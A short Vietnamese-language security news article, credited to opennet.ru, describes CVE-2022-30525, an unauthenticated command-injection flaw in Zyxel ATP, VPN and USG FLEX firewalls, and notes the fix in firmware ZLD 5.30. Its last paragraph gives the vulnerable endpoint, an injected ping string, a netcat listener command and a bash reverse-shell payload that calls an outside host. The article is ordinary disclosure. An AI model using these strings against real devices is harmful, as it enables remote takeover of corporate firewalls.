Một lỗ hổng nghiêm trọng (CVE-2022-30525) đã được xác định trong các thiết bị Zyxel thuộc dòng ATP, VPN và USG FLEX, được thiết kế để tổ chức vận hành tường lửa, IDS và VPN trong doanh nghiệp, cho phép kẻ tấn công bên ngoài thực thi mã trên thiết bị không có quyền người dùng mà không cần xác thực. Để thực hiện một cuộc tấn công, kẻ tấn công phải có khả năng gửi yêu cầu đến thiết bị bằng giao thức HTTP/HTTPS. Zyxel đã sửa lỗ hổng trong bản cập nhật firmware ZLD 5.30. Theo dịch vụ Shodan, hiện có 16213 thiết bị có khả năng bị tấn công trên mạng toàn cầu chấp nhận yêu cầu qua HTTP/HTTPS.
Hoạt động được thực hiện bằng cách gửi các lệnh được thiết kế đặc biệt tới trình xử lý web /ztp/cgi-bin/handler, có thể truy cập được mà không cần xác thực. Sự cố xảy ra do thiếu khả năng dọn dẹp thích hợp các tham số yêu cầu khi thực thi các lệnh trên hệ thống bằng lệnh gọi os.system được sử dụng trong thư viện lib_wan_settings.py và được thực thi khi xử lý thao tác setWanPortSt.
Ví dụ: kẻ tấn công có thể truyền chuỗi “; ping 192.168.1.210;" điều này sẽ dẫn đến việc thực thi lệnh “ping 192.168.1.210” trên hệ thống. Để có quyền truy cập vào shell lệnh, bạn có thể chạy “nc -lvnp 1270” trên hệ thống của mình, sau đó bắt đầu kết nối ngược bằng cách gửi yêu cầu tới thiết bị có dấu '; bash -c \\exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Nguồn: opennet.ru